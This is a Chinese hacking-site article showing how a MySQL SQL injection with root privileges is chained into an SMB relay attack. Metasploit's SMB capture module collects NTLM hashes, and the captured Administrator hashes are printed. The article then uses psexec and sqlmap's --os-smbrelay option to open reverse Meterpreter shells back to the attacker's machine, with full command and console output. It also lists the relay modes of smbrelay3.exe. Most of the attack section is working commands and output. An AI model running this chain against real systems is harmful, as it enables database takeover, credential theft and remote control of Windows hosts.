首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
Mysql Database SMBRelay AttAck
来源:http://www.dis9.com 作者:brk 发布时间:2012-02-14  

大家好,今天来更正我以前写的文章“Databases SMBRelay AttAck”,文章的内容介绍了针对MYSQL MSSQL PG三种数据库的SMBRelay AttAck,但是以前的博客数据丢失。如果谁保存了这篇请发给我。   (找出错别字留言,一个错别字一个九区邀请码)

当时介绍到MYSQL SMBRELAY ATTACK的时候,是用了解析DLL到系统权限再攻击这一个办法。这种方法似乎和我们九区的非主流脑残黑客差不多,真的很二B,解析DLL到系统权限了还攻击做啥子。。。

下面进入正文了,如果MYSQL以Administrator权限运行,那么这种攻击就能成功!

 

 

下面来PENTEST : 一个注入点,他是ROOT的权限

 

 

我们来尝试他能不能读文件,ROOT权限应该能读

 

 

恩 ,能读文件 (惊现HELEL大黑客!)

下面本地伪造个SMB SERVER服务器

msf > use auxiliary/server/capture/smb
msf  auxiliary(smb) > show options 
  
Module options (auxiliary/server/capture/smb):
  
   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   SRVHOST     0.0.0.0           yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  
msf  auxiliary(smb) > exploit
[*] Auxiliary module execution completed
  
[*] Server started.
msf  auxiliary(smb) >

然后读本共享试试

 

 

 

^_^  成功获得了 NTLM  ,

NTLMv1 Response Captured from 192.1.1.130:1162
USER:Administrator DOMAIN:DIS9TEAM-B39270 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:be55aab30bf2e1268f57f90887c0d68e2f85252cc731bb25
NTHASH:54b41c2204df7a9e1478f3cfa64bd9e250f57a764a0eef36

下面就能用METASPLOIT的 exploit/windows/smb/psexec 模块 或者NESSUS的 SMB Shell 获得系统权限

msf  exploit(psexec) > exploit 
  
[*] Started reverse handler on 192.1.1.1:1111
[*] Connecting to the server...
[*] Authenticating to 192.1.1.130:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \HgLceCLd.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (wZdMvYRY - "MWrLYVvwSxdptGUwjxeJoQYxVEOvvSh")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \HgLceCLd.exe...
[*] Sending stage (752128 bytes) to 192.1.1.130
[*] Meterpreter session 1 opened (192.1.1.1:1111 -> 192.1.1.130:1168) at 2012-01-09 16:56:34 +0800

 

如果你嫌弃上面的麻烦。你可以选择SQLMAP。强大的注入工具SQLMAP提供一条龙服务。

brk@Dis9Team:~/t/sqlmap$ sudo ./sqlmap.py -u "http://192.1.1.130/sql/index.php?id=1" --msf-path=/home/brk/t/msf3/ --os-smbrelay
[sudo] password for brk: 
  
    sqlmap/0.9 - automatic SQL injection and database takeover tool
  
http://sqlmap.sourceforge.net
  
[*] starting at: 17:04:54
  
[17:04:54] [INFO] using '/home/brk/t/sqlmap/output/192.1.1.130/session' as session file
[17:04:54] [INFO] testing connection to the target url
[17:04:54] [INFO] testing if the url is stable, wait a few seconds
[17:04:55] [INFO] url is stable
----------------省略-------------
[17:05:06] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 22 HTTP(s) requests:
---
---
  
[17:05:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
[17:05:11] [WARNING] it is unlikely that this attack will be successful because by default MySQL on Windows runs as Local System which is not a real user, it does not send the NTLM session hash when connecting to a SMB service
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 1
which is the local address? [192.1.1.1]
which local port number do you want to use? [50803] 5588
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which SMB port do you want to use?
[1] 139/TCP
[2] 445/TCP (default)
> 2
[17:06:34] [INFO] running Metasploit Framework 3 console locally, please wait..
  
 [*] Processing /home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt for ERB directives.
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> use windows/smb/smb_relay
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVHOST 192.1.1.1
SRVHOST => 192.1.1.1
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVPORT 445
SRVPORT => 445
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LPORT 5588
LPORT => 5588
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LHOST 192.1.1.1
LHOST => 192.1.1.1
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> exploit
[*] Exploit running as background job.
---------------------------------
[*] Started reverse handler on 192.1.1.1:5588
[*] Server started.
[*] Deleting \AaTNBUvw.exe...
[*] Sending Access Denied to 192.1.1.130:1204 DIS9TEAM-B39270\Administrator
[*] Sending stage (752128 bytes) to 192.1.1.130
[*] Meterpreter session 1 opened (192.1.1.1:5588 -> 192.1.1.130:1205) at 2012-01-09 17:06:51 +0800
  
Active sessions
===============
  
  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.1.1.1:5588 -> 192.1.1.130:1205

 

如果你是WINDOWS系统呢??  你可以用这个工具来进行攻击smbrelay3.exe

他提供5种攻击方式:

* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another smb host.

* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another windows computer.

* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.

* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.

* SMTP to SMB: Negotiate authentication with an email SMTP client SMB computer and relay credentials.

你懂的


 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·使用低权限 Oracle 数据库账户得
·PostgreSQL Database SMBRelay A
·强大的嗅探工具ettercap使用教程
·Metasploit 权限提升
·小记一次渗透过程:一台工作站后
·专业渗透人员在渗透过程中一定要
·28度的冰注入技巧(404页面妙用,s
·白给你的shell(搜索引擎)
·实例渗透某台湾大学全纪录
·记一次成功入侵某公司内网
·检测某贵族学校
·CNBETA第一次渗透纪实
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved